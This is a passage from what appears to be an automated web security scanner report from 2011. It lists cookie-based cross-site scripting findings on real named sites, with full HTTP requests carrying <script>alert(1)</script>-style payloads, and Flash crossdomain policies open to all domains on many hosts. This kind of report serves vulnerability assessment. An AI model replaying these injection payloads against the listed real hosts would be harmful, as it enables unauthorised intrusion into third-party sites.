GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:27 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:27 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:27 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741407; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&d5a27<script>alert(1)</script>214694deac1' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

5.65. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_p97174789 cookie is copied into the HTML document as plain text between tags. The payload e2a7a<script>alert(1)</script>9043e21f1f9 was submitted in the ar_p97174789 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:28 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:28 2011&e2a7a<script>alert(1)</script>9043e21f1f9=&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:28 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741408; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
onload);
}}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&e2a7a<script>alert(1)</script>9043e21f1f9', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "a
...[SNIP]...

5.66. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The value of the ar_s_p81479006 cookie is copied into the HTML document as plain text between tags. The payload 9ba92<script>alert(1)</script>e69fd29fdd1 was submitted in the ar_s_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=19ba92<script>alert(1)</script>e69fd29fdd1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:30 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:30 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741410; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
ne:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "ar_p97174789": 'exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_s_p81479006": '19ba92<script>alert(1)</script>e69fd29fdd1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "ar_p81479006": 'exp=1&ini
...[SNIP]...

5.67. http://forums.manageengine.com/fbw [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The value of the zdccn cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 22270"><script>alert(1)</script>5970609d8e4 was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:05 GMT
Server: Apache-Coyote/1.1
Content-Length: 25959


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<input type="hidden" id="zdrpn" name="zdrpn" value="067f90c3-40d8-4a59-bdeb-52669063c03a22270"><script>alert(1)</script>5970609d8e4">
...[SNIP]...

5.68. http://forums.manageengine.com/fbw [zdccn cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://forums.manageengine.com
Path:   /fbw

Issue detail

The value of the zdccn cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd770"-alert(1)-"80d1da2beeb was submitted in the zdccn cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /fbw?fbwId=49000004360353 HTTP/1.1
Host: forums.manageengine.com
Proxy-Connection: keep-alive
Referer: http://www.manageengine.com/products/security-manager/?gclid=CL-9_6TPt6gCFQTe4AodlRiOCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=208542606.1303732848.2.2.utmgclid=CL-9_6TPt6gCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); zdccn=067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb; JSESSIONID=9FFB2A137484D14862CCB036AE627428; __utma=208542606.1253035426.1303526945.1303526945.1303732848.2; __utmc=208542606; __utmb=208542606.4.10.1303732848

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 25 Apr 2011 12:12:06 GMT
Server: Apache-Coyote/1.1
Content-Length: 25914


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

<link href="//css.zohostat
...[SNIP]...
<script>
//For I18N
var zuid = "-1";
var csrfParamName = "zdrpn";
var csrfToken = "067f90c3-40d8-4a59-bdeb-52669063c03acd770"-alert(1)-"80d1da2beeb";
var i18n = new Array();
i18n["zohodiscussions.settings.PleaseEnteravalue"]="The input field is empty!";
i18n["zohodiscussions.generalmessage.enteraValidemailaddre
...[SNIP]...

6. Flash cross-domain policy  previous  next
There are 49 instances of this issue:


6.1. http://195.68.160.134/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.134
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.134

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:37 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 07 Nov 2008 04:42:33 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:37 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.2. http://195.68.160.166/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.166
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.166

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:26:43 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:26:43 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.3. http://195.68.160.167/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.167
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.167

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:38 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:55 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:38 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.4. http://195.68.160.40/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.40
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.40

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:57 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:57 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.5. http://195.68.160.95/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://195.68.160.95
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: 195.68.160.95

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:25:41 GMT
Content-Type: text/xml; charset=windows-1251
Content-Length: 208
Last-Modified: Fri, 31 Oct 2008 09:57:14 GMT
Connection: close
Expires: Mon, 25 Apr 2011 15:25:41 GMT
Cache-Control: max-age=3600
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" to-ports="80" />
</cross-domain
...[SNIP]...

6.6. http://ad.afy11.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.afy11.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.afy11.net

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 05 Feb 2007 18:48:56 GMT
Accept-Ranges: bytes
ETag: "e732374a5649c71:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 14:37:55 GMT
Connection: close
Content-Length: 201

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

6.7. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 20:42:14 GMT
Date: Mon, 25 Apr 2011 14:31:42 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.8. http://api.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Wed, 25 May 2011 15:17:38 GMT
X-FB-Server: 10.32.72.125
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.9. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:23:30 GMT
Date: Mon, 25 Apr 2011 14:23:30 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.10. http://beacon.securestudies.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Tue, 26 Apr 2011 14:50:23 GMT
Date: Mon, 25 Apr 2011 14:50:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.11. http://bs.mail.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.mail.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.mail.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:29:05 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:29:05 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.12. http://bs.yandex.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.yandex.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.yandex.ru

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 14:30:37 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Wed, 13 Apr 2011 08:41:27 GMT
Content-Type: application/xml
Expires: Mon, 25 Apr 2011 15:30:37 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

6.13. http://cdn-01.yumenetworks.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn-01.yumenetworks.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn-01.yumenetworks.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.7a DAV/2
ETag: "182c001-122-454adb8106440"
Accept-Ranges: bytes
Content-Type: application/xml
Age: 121191
Date: Mon, 25 Apr 2011 14:54:12 GMT
Last-Modified: Sun, 17 Aug 2008 20:30:01 GMT
Content-Length: 290
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allo
...[SNIP]...

6.14. http://counter.rambler.ru/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://counter.rambler.ru
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: counter.rambler.ru

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 14:27:04 GMT
